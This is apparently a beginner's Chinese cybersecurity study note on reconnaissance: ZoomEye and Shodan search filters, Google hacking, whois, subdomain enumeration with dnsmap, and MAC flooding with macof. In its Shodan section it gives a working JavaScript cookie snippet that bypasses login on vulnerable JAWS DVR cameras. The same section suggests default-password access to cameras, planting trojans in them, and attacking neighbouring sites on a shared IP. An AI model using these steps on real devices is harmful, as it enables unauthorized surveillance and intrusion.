【网安入门】学习笔记（七）

信息收集

• 钟馗之眼
  https://www.zoomeye.org/
  是一款针对网络空间的的搜索引擎，收录了互联网空间中的设备、网站及其使用的服务或组件信息。
• 设备
  服务器–》交换机–》路由器–》防火墙–》堡垒机\IPS\IDS–》行为管理器\网络安全狗–》互联网
  只要是互联网中的设备有IP地址，就可以搜索的到。
  【去IOE】
    它是阿里巴巴造出的概念。其本意是，在阿里巴巴的IT架构中，去掉IBM的小型机、Oracle数据库、EMC存储设备，代之以自己在开源软件基础上开发的系统。
    去IOE具体来说还有以下两个解释。
    第一个是指IT架构的更新换代，具体说就是以IBM为代表的主机、以ORACLE为代表的关系型数据库，以及以EMC为代表的高端存储设备，被新型的云计算技术所替换，也就是我们常说的“云化”。
    第二个是指针对外国IT设备，特别是美国产品的“严打”，减少甚至不再购买IBM、ORACLE、EMC等企业的产品。
• 搜索技巧
  （1）指定搜索组件
     app：组件名称
     ver：组件版本
  【中间件】
    中间件是一种独立的系统软件或服务程序，分布式应用软件借助这种软件在不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统之上，管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统的软件。
  （2）指定搜索端口
     port：端口
     3306——MySQL
     20,21:——FTP，21端口用于连接，20端口用于传输数据。
     3389——Windows 2000(2003) Server远程桌面的服务端口
     22——SSH
  （3）指定搜索的操作系统
     OS：操作系统
  （4）指定搜索的服务
     service：服务名称
  （5）指定搜索的地理位置范围
     country：国家名
     city：城市名
  （6）指定搜索CIDR的网段
     cidr：网段
  【CIDR无类域间路由】
    CIDR是一个在Internet上创建附加地址的方法，这些地址提供给服务提供商（ISP），再由ISP分配给客户。CIDR将路由集中起来，使一个IP地址代表主要骨干提供商服务的几千个IP地址，从而减轻Internet路由器的负担。
  （7）指定网站域名进行搜索
     Site：网站域名
  【域名】
    域名由两组或两组以上的ASCII或各国语言字符构成，各组字符间由点号分隔开，最右边的字符组称为顶级域名或一级域名、倒数第二组称为二级域名、倒数第三组称为三级域名、以此类推。
    如 www.ncic.ac.cn，其中www前缀表明此域名对应着万维网服务，顶级域名是 .cn，二级是ac，三级是ncic。
  （8）指定主机名
     Hostname：主机名
  （9）指定设备名
     device：设备名
  （10）指定首页关键字
     keyword：关键字

---

• shodan
  Shodan is the world’s first search engine for Internet-connected devices.
• 搜索摄像头
  在shodan中搜索JAWS/1.1（一款漏洞摄像头的品牌）并输入默认口令就可以查看摄像头内容
• 绕过未加固的摄像头的登录密码
  在控制台输入以下JS代码，然后直接访问[/view2.html]即可
  Chrome启动Javascript控制台，ctrl+shift+J

document.cookie="dvr_camcnt=4";
document.cookie="dvr_user=admin";
document.cookie="dvr_pwd=123";

• host头攻击
  搜索摄像头后可以看到摄像头的路径和端口号，若在路径中植入木马，此时这个摄像头就变成你的肉鸡。
• map搜索
  在shodan中可以通过地图定位查询附近的摄像头。

---

• Googlehack
  使用Google等搜索引擎对某些特定的网络主机漏洞（通常是服务器上的脚本漏洞）进行搜索，以达到快速找到漏洞主机或特定主机的漏洞的目的。

---

• whois查询
  用来查询域名的IP以及所有者等信息的传输协议，简单来说，就是一个用来查询域名是否已经被注册，以及注册域名的详细信息的数据库（如域名所有人、域名注册商、域名注册日期和过期日期等）。通过域名Whois服务器查询，可以查询域名归属者联系方式，以及注册和到期时间。
• 御剑扫描
  使用御剑可以扫描域名的IP地址，悬挂CDN的IP地址加一般有多个网站，利用whois来查询同ip的网站（做了跳转的需要找到真实ip），对该ip下的其他网站进行攻击，可以进入到公司的服务器中。

---

kali的信息收集

• 重启网卡

systemctl restart networking.service

• whois
  （1）将kali设置为桥接模式联网，ping一下baidu确定能联网（按上节笔记更改有线网络连接的，记得把连接的选择改回去）
  （2）输入 whois www.baidu.com查看信息
  
• 域名枚举dnsmap
  主要用来在渗透测试的信息收集阶段来协助测试网络的基础设施的安全性，它能发现目标的网段，域名，甚至是电话号码等等。
  用法：

root@kali:~# dnsmap cuit.edu.cn -w /usr/share/wordlists/dnsmap.txt -r domain.txt 

通过枚举的方法查看主域名下的分站（分站一般较主站安全性低）

• IP反向解析dig、nslookup
  IP反向解析即“正向查找区域”和“反向查找区域”，正向查找区域就是我们通常所说的域名解析，反向查找区域即是这里所说的IP反向解析，它的作用就是通过查询IP地址的PTR记录来得到该IP地址指向的域名，必需要有该IP地址的PTR记录。
  
• mac地址泛洪攻击
  将交换机的mac表快速填满，交换机中出现延迟信息

macof

• kali信息收集里还有很多应用